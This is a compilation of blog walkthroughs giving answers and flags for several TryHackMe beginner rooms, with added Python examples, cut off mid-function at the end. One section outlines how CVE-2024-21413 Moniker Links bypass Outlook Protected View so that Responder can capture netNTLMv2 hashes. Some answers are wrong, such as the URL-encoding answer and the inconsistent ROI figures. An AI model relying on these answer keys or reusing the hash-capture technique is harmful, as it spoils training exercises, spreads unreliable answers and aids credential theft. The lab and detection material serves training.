TryHackMe | Answers for CyberChef: The Basics

Hello Folks,

In this blog, we will cover the concepts as well as the answers for the “CyberChef: The Basics” room which is a part of the “Cyber Security 101” learning path. This room provides an overview of a very important web service called CyberChef used for performing cryptographic operations. After completing this room, you will find yourself comfortable with Encryption, Hashing and Encoding.

You can access the room here.

Task 1 Introduction

CyberChef is a versatile, web-based tool for handling various cyber operations, from simple encodings like Base64 to complex encryptions like AES. It operates through “recipes,” or sequences of tasks applied to data. Key learning includes navigating its interface, understanding operations, and creating data-processing recipes.

Proceed with the next tasks to learn more!

No answer required

Task 2 Accessing the Tool

This task will help us access the CyberChef tool. There are two methods: first, accessing it via a web browser, and second, downloading the stable release, which works on both Linux and Windows Operating Systems.

I have access to CyberChef and I’m ready to dive into it.

No answer required

Task 3 Navigating the Interface

This task walks us through the CyberChef interface, which has four main sections: Operations, Recipe, Input, and Output. The Operations area offers a wide range of categorized functions, the Recipe area lets users arrange and manage operations, the Input area is for entering data, and the Output area displays processed results with options to save or copy.

Q 3.1- In which area can you find “From Base64”?

A 3.1- Operations

Q 3.2- Which area is considered the heart of the tool?

A 3.2- Recipe

Task 4 Before Anything Else

Using CyberChef involves a four-step process: define a clear objective, input your data, choose relevant operations (like encryption/encoding methods), and review the output to ensure the goal is achieved. If the result isn’t as expected, refine and repeat the steps.

Q 4.1- At which step would you determine, “What do I want to accomplish?”

A 4.1- 1

Task 5 Practice, Practice, Practice

This task explores CyberChef’s main operation categories—Extractors, Date/Time, and Data Format. It covers extracting data (like IP addresses, URLs, emails), converting timestamps, and encoding formats (e.g., Base64). A practical exercise lets users apply these operations by analyzing task files.

Q 5.1- What is the hidden email address?

A 5.1- hidden@hotmail.com

Q 5.2- What is the hidden IP address that ends in .232?

A 5.2- 102.20.11.232

Q 5.3- Which domain address starts with the letter “T”?

A 5.3- TryHackMe.com

Q 5.4- What is the binary value of the decimal number 78?

A 5.4- 01001110

Q 5.5- What is the URL encoded value of https://tryhackme.com/r/careers?

A 5.5- https://tryhackme.com/r/careers

Task 6 Your First Official Cook

In this task, we have to practically apply whatever we have learned in this room to get a deeper understanding of all the concepts.

Q 6.1- Using the file you downloaded in Task 5, which IP starts and ends with “10”?

A 6.1- 10.10.2.101

Q 6.2- What is the base64 encoded value of the string “Nice Room!”?

A 6.2- TmljZSBSb29tIQ==

Q 6.3- What is the URL decoded value for https%3A%2F%2Ftryhackme%2Ecom%2Fr%2Froom%2Fcyberchefbasics?

A 6.3- https://tryhackme.com/r/room/cyberchefbasics

Q 6.4- What is the datetime string for the Unix timestamp 1725151258?

A 6.4- Sun 1 September 2024 00:40:58 UTC

Q 6.5- What is the Base85 decoded string of the value <+oue+DGm>Ap%u7?

A 6.5- This is fun!
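To see what each CyberChef operation used in Tasks 5 and 6 actually does to the bytes, here is an added example in plain Python (not part of the original write-up or of CyberChef itself). Only the inputs quoted in the questions come from the page; SAMPLE_TEXT is constructed to give the extractors something to work on, and the URL Encode safe set is an assumption that mirrors CyberChef's default (reserved characters left alone).

```python
"""Plain-Python equivalents of the CyberChef operations used in Tasks 5 and 6."""
import base64
import re
from datetime import datetime, timezone
from urllib.parse import quote, unquote

# --- Extractors (Task 5): email addresses, IPv4 addresses and domains ---
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_RE = re.compile(rf"\b{OCTET}(?:\.{OCTET}){{3}}\b")
DOMAIN_RE = re.compile(r"\b(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}\b")


def extract_emails(text):
    return sorted(set(EMAIL_RE.findall(text)))


def extract_ips(text):
    return sorted(set(IPV4_RE.findall(text)))


def extract_domains(text):
    # Blank out email addresses first so their domain part is not reported twice.
    return sorted(set(DOMAIN_RE.findall(EMAIL_RE.sub(" ", text))))


# --- Data Format (Tasks 5 and 6) ---
def to_binary(value, width=8):
    """Decimal integer to a zero-padded binary string (CyberChef 'To Binary')."""
    return format(value, f"0{width}b")


# Assumption: CyberChef's default "URL Encode" leaves reserved characters alone,
# so quote() is told to keep them too (the "encode all special chars" option would not).
RESERVED = ":/?#[]@!$&'()*+,;="


def url_encode(text):
    return quote(text, safe=RESERVED)


def url_decode(text):
    return unquote(text)


def base64_encode(text):
    return base64.b64encode(text.encode()).decode()


def base85_decode(text):
    # CyberChef's "From Base85" default alphabet is standard Ascii85, which a85decode implements.
    return base64.a85decode(text).decode()


# --- Date/Time (Task 6): Unix timestamp to a human-readable UTC string ---
def unix_to_datetime(ts):
    dt = datetime.fromtimestamp(ts, tz=timezone.utc)
    return f"{dt:%a} {dt.day} {dt:%B %Y %H:%M:%S} UTC"


# Constructed sample input for the extractors (not the room's task file).
SAMPLE_TEXT = (
    "Ticket notes: contact hidden@hotmail.com, scanner seen from "
    "102.20.11.232 and 10.10.2.101, see TryHackMe.com for the room."
)

if __name__ == "__main__":
    print(extract_emails(SAMPLE_TEXT), extract_ips(SAMPLE_TEXT), extract_domains(SAMPLE_TEXT))
    print(to_binary(78), base64_encode("Nice Room!"), base85_decode("<+oue+DGm>Ap%u7"))
    print(url_decode("https%3A%2F%2Ftryhackme%2Ecom%2Fr%2Froom%2Fcyberchefbasics"))
    print(unix_to_datetime(1725151258))
```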

Task 7 Conclusion

I will have CyberChef, the Swiss Army knife of cyber security, ready for my upcoming journeys!

No answer required

You can check out our other blogs here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe | Answers for Training Impact on Teams

Hello Folks,

In this blog, we will cover the importance of, as well as the answers for, the “Training Impact on Teams” room, which is a part of the “Cyber Security 101” learning path. This room explains why cyber security training matters for organizations. We will learn some key concepts about how training is carried out and the impact it has on ensuring security.

You can access the room here.

Task 1 Understanding the Impact of Cyber Security Training

Mastering cybersecurity requires practice in safe environments, like training labs, to build skills without risking live systems. Training not only enhances individual and team readiness but also aligns skill levels within organizations, fostering collaboration, faster learning, and better incident response.

Q 1.1- What is the most efficient way to ramp up the skills of a junior hire in cyber security?

A 1.1- Training

Task 2 Cyber Security Training for Large Organisations

Off-the-shelf training is ideal for small teams, but larger teams or those with specific needs benefit from customizable options like TryHackMe’s Content Studio. Large corporations often seek integrated solutions with features like SSO and APIs to seamlessly incorporate training into existing systems.

Q 2.1- What is the name of the dashboard that TryHackMe offers for companies to create customised training paths?

A 2.1- Content Studio

Task 3 Write a Cyber Security Training Investment Proposal

Companies can see significant ROI from training investments, as shown in a case where a cybersecurity team of 10 improves productivity by 4%, yielding $32,000 in savings versus a $5,000 training cost, resulting in a 640% ROI. Proposals detailing these benefits, like the one from TryHackMe, can help secure training budgets.

Q 3.1- What would be the savings due to the increased productivity?

A 3.1- 40000

Q 3.2- Assuming that training costs $500 per employee, what is the Return on Investment?

A 3.2- 400%

Task 4 Vendor Selection

When selecting a training vendor, consider questions such as the training’s target audience, content relevance, vendor experience, platform capabilities, and cost-benefit alignment. Addressing these helps ensure the training aligns with organizational needs and optimizes team productivity.

Remember to consider the above questions as you work to select the training provider.

No answer required

Task 5 Conclusion

Training is crucial for a cybersecurity team’s effectiveness and benefits both employees and employers, as many embrace lifelong learning.

Let’s continue investing in our knowledge and skills.

No answer required

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers for SOC Fundamentals

Hello Folks,

In this blog, we will cover the concepts as well as the answers for the “SOC Fundamentals” room, which is a part of the “Cyber Security 101” learning path. It will cover the fundamentals of a Security Operations Center (SOC), including its purpose and components. At the end there is a practical exercise, after which we will be familiar with the operations performed in a SOC.

You can access the room by clicking here.

Task 1 Introduction to SOC

This task introduces us to the basic concept of a SOC, which protects critical data from cyber threats. A Security Operations Center (SOC) is a dedicated team that monitors networks 24/7 to detect and respond to malicious activity, protecting the company’s assets.

Q 1.1- What does the term SOC stand for?

A 1.1- Security Operations Center 

Task 2 Purpose and Components

In this section, we will dive deep into the purpose and components of a SOC. The primary focus of a SOC is Detection and Response. Effective SOC operations rely on people, process and technology, which together create an efficient environment for detection and response.

Q 2.1- The SOC team discovers an unauthorized user is trying to log in to an account. Which capability of SOC is this?

A 2.1- Detection

Q 2.2- What are the three pillars of a SOC?

A 2.2- People, Process, Technology

Task 3 People

Despite automation, skilled People in a SOC are essential for filtering out false alerts and identifying real threats. The SOC team includes roles like Level 1-3 Analysts for escalating threat detection, security and detection engineers for deploying and managing security solutions, and a SOC Manager who oversees processes and reports to the CISO on security posture.

Q 3.1- Alert triage and reporting is the responsibility of?

A 3.1- SOC Analyst (Level 1)

Q 3.2- Which role in the SOC team allows you to work dedicatedly on establishing rules for alerting security solutions?

A 3.2- Detection Engineer

Task 4 Process

SOC processes involve alert triage, where analysts assess alerts using the “5 Ws” (What, When, Where, Who, Why) to prioritize threats, and reporting, where critical findings are escalated as detailed tickets. For severe threats, the team conducts incident response and forensics to analyze and contain malicious activities, identifying root causes.

Q 4.1- At the end of the investigation, the SOC team found that John had attempted to steal the system’s data. Which ‘W’ from the 5 Ws does this answer?

A 4.1- Who

Q 4.2- The SOC team detected a large amount of data exfiltration. Which ‘W’ from the 5 Ws does this answer?

A 4.2- What

Task 5 Technology

In a SOC, technology encompasses security solutions that centralize threat detection and response, minimizing manual effort. Key tools include SIEM for log-based threat detection, EDR for endpoint visibility and response, and firewalls for network traffic filtering. These technologies, along with others like IDS/IPS and SOAR, are chosen based on organizational needs and resources to effectively safeguard the network.

Q 5.1- Which security solution monitors the incoming and outgoing traffic of the network?

A 5.1- Firewall

Q 5.2- Do SIEM solutions primarily focus on detecting and alerting about security incidents? (yea/nay)

A 5.2- yea

Task 6 Practical Exercise of SOC

In this section, a practical task is given to practice the things we have learnt in this room.

Q 6.1- What: Activity that triggered the alert?

A 6.1- Port Scan

Q 6.2- When: Time of the activity? 

A 6.2- June 12, 2024 17:24

Q 6.3- Where: Destination host IP? 

A 6.3- 10.0.0.3

Q 6.4- Who: Source host name?

A 6.4- Nessus

Q 6.5- Why: Reason for the activity? Intended/Malicious

A 6.5- Intended

Q 6.6- Additional Investigation Notes: Has any response been sent back to the port scanner IP? (yea/nay)

A 6.6- Yea

Q 6.7- What is the flag found after closing the alert?

A 6.7- THM{000_INTRO_TO_SOC}

Task 7 Conclusion

I understand the fundamentals of a SOC.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers for Web Application Basics

Hello Folks,
In this blog, we will cover the concepts as well as the answers for the “Web Application Basics” room, which is a part of the “Cyber Security 101” learning path. It will cover web application fundamentals, including key topics such as URLs, HTTP request/response headers, methods and status codes. After completing this blog, you will be familiar with how web applications work.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives for understanding the basics of web application architecture.

I am ready to learn about Web Applications!

No answer needed

Task 2 Web Application Overview

In this task, a web app is compared to a planet: the Front End is the surface visible to everyone, built with languages like HTML, CSS and JavaScript, while the Back End is the planet’s hidden part, including the infrastructure, database and security systems like Web Application Firewalls (WAF).

Q 2.1- Which component on a computer is responsible for hosting and delivering content for web applications?

A 2.1- Web Server

Q 2.2- Which tool is used to access and interact with web applications?

A 2.2- Web Browser

Q 2.3- Which component acts as a protective layer, filtering incoming traffic to block malicious attacks, and ensuring the security of the web application?

A 2.3- Web Application Firewall

Task 3 Uniform Resource Locator

This task focuses on one of the important components through which a user accesses a web application: the URL, sometimes called a web address. It has various components such as the Scheme (HTTP/HTTPS), User (login details), Host/Domain (identifies the website), Path (resource location or web page), Query String (input for searches) and Fragment (for accessing a specific section of a web page).

Q 3.1- Which protocol provides encrypted communication to ensure secure data transmission between a web browser and a web server?

A 3.1- HTTPS

Q 3.2- What term describes the practice of registering domain names that are misspelt variations of popular websites to exploit user errors and potentially engage in fraudulent activities?

A 3.2- Typosquatting

Q 3.3- What part of a URL is used to pass additional information, such as search terms or form inputs, to the web server?

A 3.3- Query String

Task 4 HTTP Messages

This section dives deep into HTTP messages, which are exchanged between a client browser and a web server: requests coming from the user and responses coming from the server. These messages contain a start line, headers, an empty line and a body. Understanding these components is crucial for web application communication.

Q 4.1- Which HTTP message is returned by the web server after processing a client’s request?

A 4.1- HTTP Response

Q 4.2- What follows the headers in an HTTP message?

A 4.2- Empty Line

Task 5 HTTP Request: Request Line and Methods

This section will help us understand an HTTP request, which is sent by a user to a web server and includes a request line (method, path, version), various HTTP methods (GET, POST, etc.), and a URL path that directs the server to the desired resource. Each method has unique security implications, and newer HTTP versions (like HTTP/2 and HTTP/3) enhance speed and security, though many systems still use HTTP/1.1.

Q 5.1- Which HTTP protocol version became widely adopted and remains the most commonly used version for web communication, known for introducing features like persistent connections and chunked transfer encoding?

A 5.1- HTTP/1.1

Q 5.2- Which HTTP request method describes the communication options for the target resource, allowing clients to determine which HTTP methods are supported by the web server?

A 5.2- OPTIONS

Q 5.3- In an HTTP request, which component specifies the specific resource or endpoint on the web server that the client is requesting, typically appearing after the domain name in the URL?

A 5.3- URL Path

Task 6 HTTP Request: Headers and Body

This task will provide an introduction to common HTTP request headers and body. Request headers provide additional details to the server, such as the host, user-agent, and content type. The request body, present in POST/PUT requests, contains data in formats like URL-encoded, form data, JSON, or XML—each suited for different data structures and types.

Q 6.1- Which HTTP request header specifies the domain name of the web server to which the request is being sent?

A 6.1- Host

Q 6.2- What is the default content type for form submissions in an HTTP request where the data is encoded as key=value pairs in a query string format?

A 6.2- application/x-www-form-urlencoded

Q 6.3- Which part of an HTTP request contains additional information like host, user agent, and content type, guiding how the web server should process the request?

A 6.3- Request Headers

Task 7 HTTP Response: Status Line and Status Codes

This section covers the concepts of HTTP Responses which include a status code and reason phrase to indicate the outcome of a request. These codes fall into categories like informational (100-199), successful (200-299), redirection (300-399), client errors (400-499), and server errors (500-599). Common examples are 200 (OK), 404 (Not Found), and 500 (Internal Server Error).

Q 7.1- What part of an HTTP response provides the HTTP version, status code, and a brief explanation of the response’s outcome?

A 7.1- Status Line

Q 7.2- Which category of HTTP response codes indicates that the web server encountered an internal issue or is unable to fulfil the client’s request?

A 7.2- Server Error Responses

Q 7.3- Which HTTP status code indicates that the requested resource could not be found on the web server?

A 7.3- 404

Task 8 HTTP Response: Headers and Body

HTTP response headers are key-value pairs that provide important details to the client, such as content type, server info, and caching instructions. Essential headers include Date, Content-Type, and Server, while others like Set-Cookie, Cache-Control, and Location offer additional functionality, like managing cookies and caching.

Q 8.1- Which HTTP response header can reveal information about the web server’s software and version, potentially exposing it to security risks if not removed?

A 8.1- Server

Q 8.2- Which flag should be added to cookies in the Set-Cookie HTTP response header to ensure they are only transmitted over HTTPS, protecting them from being exposed during unencrypted transmissions?

A 8.2- Secure

Q 8.3- Which flag should be added to cookies in the Set-Cookie HTTP response header to prevent them from being accessed via JavaScript, thereby enhancing security against XSS attacks?

A 8.3- HttpOnly

Task 9 Security Headers

HTTP Security Headers enhance web application security by mitigating risks like Cross-Site Scripting (XSS) and clickjacking. Key headers include Content-Security-Policy (CSP), which defines safe content sources; Strict-Transport-Security (HSTS), which enforces HTTPS connections; X-Content-Type-Options, which prevents MIME type sniffing; and Referrer-Policy, which controls referrer information shared during redirection. These headers work together to strengthen web security.

Q 9.1- In a Content Security Policy (CSP) configuration, which property can be set to define where scripts can be loaded from?

A 9.1- script-src

Q 9.2- When configuring the Strict-Transport-Security (HSTS) header to ensure that all subdomains of a site also use HTTPS, which directive should be included to apply the security policy to both the main domain and its subdomains?

A 9.2- includeSubDomains

Q 9.3- Which HTTP header directive is used to prevent browsers from interpreting files as a different MIME type than what is specified by the server, thereby mitigating content type sniffing attacks?

A 9.3- nosniff
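The message structure from Tasks 4 and 7 and the header checks from Tasks 8 and 9 can be put together in one small script: parse a raw HTTP response into its start line, headers and body, then audit the headers for the Server leak, the cookie flags and the security headers the room names. This is an added example, not part of the original write-up or of TryHackMe's material; both sample responses are constructed, and the Server value is made up.

```python
"""Parse a raw HTTP response and audit its headers for the issues in Tasks 8 and 9."""
from dataclasses import dataclass


@dataclass
class HttpResponse:
    version: str
    status_code: int
    reason: str
    headers: dict   # lower-cased header name -> list of values (Set-Cookie may repeat)
    body: str


def parse_response(raw: str) -> HttpResponse:
    # Start line and headers are separated from the body by an empty line (CRLF CRLF).
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)          # status line, e.g. "HTTP/1.1 200 OK"
    version, code = parts[0], int(parts[1])
    reason = parts[2] if len(parts) > 2 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return HttpResponse(version, code, reason, headers, body)


def status_category(code: int) -> str:
    """Map a status code to the category its first digit denotes (Task 7)."""
    names = {1: "informational", 2: "successful", 3: "redirection",
             4: "client error", 5: "server error"}
    return names.get(code // 100, "unknown")


def audit_headers(resp: HttpResponse) -> list:
    """Return a list of findings; an empty list means every check passed."""
    h = resp.headers
    findings = []
    if "server" in h:                                   # Task 8, Q 8.1
        findings.append(f"Server header reveals software: {h['server'][0]}")
    for cookie in h.get("set-cookie", []):              # Task 8, Q 8.2 / Q 8.3
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly")
    csp = h.get("content-security-policy", [""])[0]    # Task 9, Q 9.1
    if "script-src" not in csp:
        findings.append("CSP missing or has no script-src directive")
    hsts = h.get("strict-transport-security")           # Task 9, Q 9.2
    if hsts is None:
        findings.append("Strict-Transport-Security missing")
    elif "includesubdomains" not in hsts[0].lower():
        findings.append("HSTS lacks includeSubDomains")
    if h.get("x-content-type-options", [""])[0].lower() != "nosniff":   # Q 9.3
        findings.append("X-Content-Type-Options is not nosniff")
    if "referrer-policy" not in h:
        findings.append("Referrer-Policy missing")
    return findings


# Constructed sample responses: a weak one and its hardened counterpart.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 01 Sep 2024 00:40:58 GMT\r\n"
    "Server: ExampleHTTPd/1.2.3\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: session=abc123; Path=/\r\n"
    "\r\n"
    "<html><body>Hello</body></html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 01 Sep 2024 00:40:58 GMT\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "Content-Security-Policy: default-src 'self'; script-src 'self'\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Referrer-Policy: strict-origin-when-cross-origin\r\n"
    "\r\n"
    "<html><body>Hello</body></html>"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        resp = parse_response(raw)
        print(label, resp.status_code, status_category(resp.status_code), audit_headers(resp))
```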

Task 10 Practical Task: Making HTTP Requests

In this section, a practical task is given to practice the things we have learnt in this room.

Q 10.1- Make a GET request to /api/users. What is the flag?

A 10.1- THM{YOU_HAVE_JUST_FOUND_THE_USER_LIST}

Q 10.2- Make a POST request to /api/user/2 and update the country of Bob from UK to US. What is the flag?

A 10.2- THM{YOU_HAVE_MODIFIED_THE_USER_DATA}

Q 10.3- Make a DELETE request to /api/user/1 to delete the user. What is the flag?

A 10.3- THM{YOU_HAVE_JUST_DELETED_A_USER}

Task 11 Conclusion

I’m ready to move forward and learn more about web application security.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers for Moniker Link (CVE-2024-21413)

Hello Folks,
In this introductory blog, we will cover the answers for the “Moniker Link (CVE-2024-21413)” room which is a part of the “Cyber Security 101” learning path. This room covers a critical Remote Code Execution (RCE) and credential leak vulnerability in Microsoft Outlook. This vulnerability allows attackers to exploit malicious Moniker Links in emails, leaking NTLM credentials from affected Office versions.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites for understanding the CVE-2024-21413 vulnerability.

Q 1.1- What “Severity” rating has the CVE been assigned?

A 1.1- Critical

Task 2 Moniker Link (CVE-2024-21413)

In this task, we will understand the overview of CVE-2024-21413 in which attackers exploited Moniker links by modifying them with special characters to bypass Outlook’s Protected View security feature.

Q 2.1- What Moniker Link type do we use in the hyperlink?

A 2.1- file://

Q 2.2- What is the special character used to bypass Outlook’s “Protected View”?

A 2.2- !

Task 3 Exploitation

Here, we dive deep into the exploitation part of this vulnerability, where an intruder can craft an email containing a Moniker Link designed to bypass Outlook’s security feature and capture the netNTLMv2 hash of the user who clicks on it. Adversaries in this scenario can use Responder to capture the hashes.

Q 3.1- What is the name of the application that we use on the AttackBox to capture the user’s hash?

A 3.1- Responder

Q 3.2- What type of hash is captured once the hyperlink in the email has been clicked?

A 3.2- netNTLMV2

Task 4 Detection

To detect this vulnerability, a YARA rule was created that identifies the “file:\” element in Moniker Links. Capturing packets via sniffing can also reveal SMB requests from victims containing truncated netNTLMv2 hashes.

Click me to proceed onto the next task!

No answer needed
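The detection idea from Task 4, a rule that looks for the file: element in Moniker Links, can be reproduced as a small mail-content scanner. This is an added example, not the YARA rule the room refers to and not part of the original write-up: it flags any file: hyperlink in an email body and raises the severity when the link carries the “!” character the room mentions. The sample emails are constructed, with .invalid placeholder hosts.

```python
"""Flag file: Moniker Links in email bodies, as a defender's triage helper."""
import re

# file: links written with either forward slashes or backslashes, up to the
# next whitespace or quote/angle bracket (the usual end of an href value).
FILE_LINK_RE = re.compile(r"file:(?://|\\\\)[^\s\"'<>]+", re.IGNORECASE)


def scan_email_body(body: str) -> list:
    """Return (severity, link) tuples for every file: link found in the body."""
    findings = []
    for match in FILE_LINK_RE.finditer(body):
        link = match.group(0)
        # A '!' inside the link is the special character the room describes
        # as the Protected View bypass, so treat it as the higher severity.
        severity = "high" if "!" in link else "medium"
        findings.append((severity, link))
    return findings


def triage(emails: dict) -> dict:
    """Map each email id to its worst finding ('clean' when nothing matched)."""
    order = {"clean": 0, "medium": 1, "high": 2}
    result = {}
    for email_id, body in emails.items():
        levels = [severity for severity, _ in scan_email_body(body)] or ["clean"]
        result[email_id] = max(levels, key=order.get)
    return result


# Constructed sample emails (hosts are placeholders, not real machines).
SAMPLE_EMAILS = {
    "benign": '<a href="https://tryhackme.com/r/room/cyberchefbasics">Room link</a>',
    "file_link": '<a href="file://fileserver.invalid/reports/q3.pdf">Quarterly report</a>',
    "suspicious": '<a href="file://placeholder.invalid/share/notes.rtf!x">Open notes</a>',
}

if __name__ == "__main__":
    for email_id, verdict in triage(SAMPLE_EMAILS).items():
        print(f"{email_id}: {verdict}")
```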

Task 5 Remediation

This section discusses the mitigation steps Microsoft took immediately in February’s “Patch Tuesday”; users were also advised to avoid clicking on unsolicited links without previewing them first.

Click me to proceed onto the next task.

No answer needed

Task 6 Conclusion

Mischief managed.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Cryptography Basics

Hello Folks,

In this introductory blog, we will cover the answers for the “Cryptography Basics” room, which is a part of the “Cyber Security 101” learning path. This room covers the basics of cryptography, which secures digital communication by maintaining the confidentiality, integrity and authenticity of data. We will cover many related concepts such as symmetric and asymmetric cryptography, encoding and the basic math behind these ciphers.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites of this room. You can work on it to understand the concepts of Cryptography.

I’m ready to start learning about cryptography!

No answer needed

Task 2 Importance of Cryptography

Cryptography has become vital for every online transaction and communication, as it protects our data privacy from intruders. In this section, we will understand its importance.

Q 2.1- What is the standard required for handling credit card information?

A 2.1- PCI DSS

Task 3 Plaintext to Ciphertext

In this task, we will explore the concepts of Plaintext, which is the human-readable and understandable form of data, and Ciphertext, which is the non-human-readable form. Key terms include plaintext, ciphertext, encryption and decryption.

Q 3.1- What do you call the encrypted plaintext?

A 3.1- Ciphertext

Q 3.2- What do you call the process that returns the plaintext?

A 3.2- decryption

Task 4 Historical Ciphers

This task presents the history of cryptography, in which one of the oldest algorithms, the Caesar Cipher, was built and used. This cipher is considered weak by today’s standards, but now we have other ciphers to use such as Base64, Morse Code, etc.

Q 4.1- Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext?

A 4.1- ICANENCRYPT
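Why the Caesar Cipher counts as weak is easiest to see by trying every key: there are only 25 of them. The added example below (not part of the original write-up) shifts letters, brute-forces all keys against the Task 4 ciphertext XRPCTCRGNEI, and picks the candidate that looks most like English; the letter-frequency scoring is an assumption of this example, a simple heuristic rather than anything the room prescribes.

```python
"""Caesar cipher: shift, brute-force all 25 keys, and rank candidates by English letter frequency."""
import string

ALPHABET = string.ascii_uppercase

# Approximate English letter frequencies in percent (assumed heuristic, not from the room).
ENGLISH_FREQ = {
    "E": 12.7, "T": 9.1, "A": 8.2, "O": 7.5, "I": 7.0, "N": 6.7, "S": 6.3, "H": 6.1,
    "R": 6.0, "D": 4.3, "L": 4.0, "C": 2.8, "U": 2.8, "M": 2.4, "W": 2.4, "F": 2.2,
    "G": 2.0, "Y": 2.0, "P": 1.9, "B": 1.5, "V": 1.0, "K": 0.8, "J": 0.15, "X": 0.15,
    "Q": 0.1, "Z": 0.07,
}


def caesar_shift(text: str, key: int) -> str:
    """Shift every letter by `key` positions; non-letters pass through unchanged."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_encrypt(plaintext: str, key: int) -> str:
    return caesar_shift(plaintext, key)


def caesar_decrypt(ciphertext: str, key: int) -> str:
    return caesar_shift(ciphertext, -key)


def brute_force(ciphertext: str) -> dict:
    """Every possible decryption, keyed by the shift that produced it."""
    return {key: caesar_decrypt(ciphertext, key) for key in range(1, 26)}


def english_score(text: str) -> float:
    """Higher when the text is made of common English letters."""
    return sum(ENGLISH_FREQ.get(ch, 0.0) for ch in text)


def best_guess(ciphertext: str) -> tuple:
    """Return (key, plaintext) for the candidate with the highest English score."""
    candidates = brute_force(ciphertext)
    key = max(candidates, key=lambda k: english_score(candidates[k]))
    return key, candidates[key]


if __name__ == "__main__":
    for key, candidate in brute_force("XRPCTCRGNEI").items():
        print(f"key {key:2d}: {candidate}  score={english_score(candidate):.1f}")
    print("best guess:", best_guess("XRPCTCRGNEI"))
```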

Task 5 Types of Encryption

In this section, we will cover two types of encryption: symmetric encryption, where a shared key is used for both encryption and decryption, and asymmetric encryption, where two different but mathematically related keys are used, one for encryption and the other for decryption.

Q 5.1- Should you trust DES? (Yea/Nay)

A 5.1- Nay

Q 5.2- When was AES adopted as an encryption standard?

A 5.2- 2001

Task 6 Basic Math

The two fundamental mathematical operations on which most cryptographic ciphers are based are XOR and the modulo operation. We can understand these concepts by going through this task.

Q 6.1- What’s 1001 ⊕ 1010?

A 6.1- 0011

Q 6.2- What’s 118613842%9091?

A 6.2- 3565

Q 6.3- What’s 60%12?

A 6.3- 0

Task 7 Summary

Before proceeding to the next room, make sure you have taken note of all the key terms and concepts introduced in this room.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Networking Concepts

Hello Folks,

In this introductory blog, we will cover the answers for the “Networking Concepts” room which is a part of the “Cyber Security 101” learning path. This room covers the basics of networking, including the concepts of the OSI model, TCP/IP model, IP addresses, subnets, routing, and TCP/UDP. This knowledge will help us understand the backbone of computer networks.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites of this room. You can work on it to understand the networking concepts.

Get your notepad ready, and let’s begin.

No Answer Needed

Task 2 OSI Model

This task covers one of the most vital concepts of networking, the OSI Model. It is a 7-layer framework governing network communication. Read through its concepts and then we can easily answer the following questions.

Q 2.1- Which layer is responsible for connecting one application to another?

A 2.1- Layer 4

Q 2.2- Which layer is responsible for routing packets to the proper network?

A 2.2- Layer 3

Q 2.3- In the OSI model, which layer is responsible for encoding the application data?

A 2.3- Layer 6

Q 2.4- Which layer is responsible for transferring data between hosts on the same network segment?

A 2.4- Layer 2

Task 3 TCP/IP Model

The TCP/IP model is another communication model that helps us understand network communication. It is a simplified form of the OSI model. Go through its concepts and then work on the following questions.

Q 3.1- To which layer does HTTP belong in the TCP/IP model?

A 3.1- Application Layer

Q 3.2- How many layers of the OSI model does the application layer in the TCP/IP model cover?

A 3.2- 3

Task 4 IP Addresses and Subnets

This task will provide us with in-depth knowledge of IP addresses, which uniquely identify every device present on a network. We will explore different types of IP addresses and a very important technique called Network Address Translation (NAT).

Q 4.1- Which of the following IP addresses is not a private IP address?

a) 192.168.250.125

b) 10.20.141.132

c) 49.69.147.197

d) 172.23.182.251

A 4.1- 49.69.147.197

Q 4.2- Which of the following IP addresses is not a valid IP address?

a) 192.168.250.15

b) 192.168.254.17

c) 192.168.305.19

d) 192.168.199.13

A 4.2- 192.168.305.19
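The two Task 4 questions are really two checks, “is this a syntactically valid IPv4 address?” and “does it fall inside a private range?”, and both are worth having as code rather than eyeballing octets. This is an added example, not part of the original write-up: the eight addresses are the options from the questions, the private ranges are the RFC 1918 blocks, and it goes slightly beyond the task by also checking whether two hosts share a subnet for a given prefix length.

```python
"""Validate IPv4 addresses, classify private vs public, and test subnet membership."""
import ipaddress

# RFC 1918 private address blocks.
PRIVATE_RANGES = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def is_valid_ipv4(addr: str) -> bool:
    """Dotted-quad check: exactly four decimal octets, each between 0 and 255."""
    parts = addr.split(".")
    if len(parts) != 4:
        return False
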